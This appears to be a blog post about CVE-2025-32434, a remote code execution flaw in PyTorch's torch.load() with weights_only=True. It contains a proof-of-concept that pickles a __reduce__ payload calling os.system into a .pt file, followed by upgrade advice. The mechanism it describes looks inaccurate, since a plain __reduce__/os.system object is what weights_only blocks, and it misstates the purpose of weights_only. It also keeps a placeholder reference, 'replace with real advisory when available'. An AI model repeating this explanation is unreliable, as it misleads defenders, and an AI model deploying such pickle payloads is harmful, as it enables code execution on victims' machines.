PyTorch is one of the most popular deep learning libraries for Python, used by professionals and researchers for everything from computer vision to natural language processing. Its ease of use, fast computations on CUDA GPUs, and dynamic computation graphs make it a favorite. However, with popularity comes risk: a critical security issue, CVE-2025-32434, has been found in PyTorch versions up to 2.5.1.

This post explains what CVE-2025-32434 is, how it can be exploited, shows a code snippet of how the exploit works, and wraps up with details on patches and best practices. If you use PyTorch or handle .pt model files, this is a must-read.

What is CVE-2025-32434?

CVE-2025-32434 is a Remote Command Execution (RCE) vulnerability. It lies in PyTorch’s torch.load() function when called with the argument weights_only=True. In simple terms, if you load a model from an untrusted .pt file, attackers can execute arbitrary code on your machine—potentially gaining full control.

Why is this dangerous?

Model files (.pt) can now be more than just data: they can hide malicious code. Sharing models with colleagues or downloading pre-trained weights from the web—a common pattern in the machine learning world—now carries risk if you’re running a vulnerable PyTorch version.

How Does the Vulnerability Work?

The vulnerability exists in how PyTorch deserializes files using torch.load(). Serialization is the process of converting data or objects to a storable format, and deserialization is the reverse. In PyTorch, the popular file extension for serialized models is .pt.

When torch.load() is called with weights_only=True (introduced to speed up loading or to sidestep Python object pickling), PyTorch is supposed to safely extract only tensor weights and ignore Python code. However, in versions up to 2.5.1, a flaw means that malicious code embedded in the model file can slip through and run.

Example Exploit Model

Let’s look at how someone might create a malicious model file that triggers this bug.

import torch
import os

class Malicious(object):
    def __reduce__(self):
        return (os.system, ('echo HACKED > /tmp/hacked.txt', ))

malicious_tensor = torch.tensor([1,2,3])
with open('malicious.pt', 'wb') as f:
    torch.save({'weights': malicious_tensor, 'exploit': Malicious()}, f)

Now, if someone loads this with

import torch
model = torch.load('malicious.pt', weights_only=True)

It will execute the payload—here, dropping a file /tmp/hacked.txt as a demo. Real attacks could run almost any command!

What’s Happening?

Though weights_only=True is supposed to disable running Python code, it doesn’t work fully in 2.5.1 and below. The ‘exploit’ entry in the pickle triggers arbitrary code execution.

The issue has been fixed in PyTorch 2.6.. You should upgrade immediately to stay safe

pip install --upgrade torch

Do not load untrusted model files with torch.load(), especially with weights_only=True, on older PyTorch versions. If you must load models from questionable sources, consider using offline tools to analyze or convert them first — or run the process inside a secure, isolated environment.

References

- PyTorch Security Advisory (replace with real advisory when available)
- CVE-2025-32434 at NIST
- PyTorch docs: torch.load

Conclusion

CVE-2025-32434 is a wake-up call for everyone working with machine learning models: don’t take model files from the internet for granted, and always update fast when your tools announce security patches. If you used torch.load(weights_only=True) with untrusted models in PyTorch 2.5.1 or earlier, upgrade now and audit your exposure.

Machine learning is changing the world, but we must stay secure as we push the cutting edge.


Remember: Upgrading PyTorch is the easiest and most effective fix. Never load model files from sources you don’t trust, and keep watch for future security advisories.

Timeline

Published on: 04/18/2025 16:15:23 UTC
Last modified on: 05/28/2025 13:14:20 UTC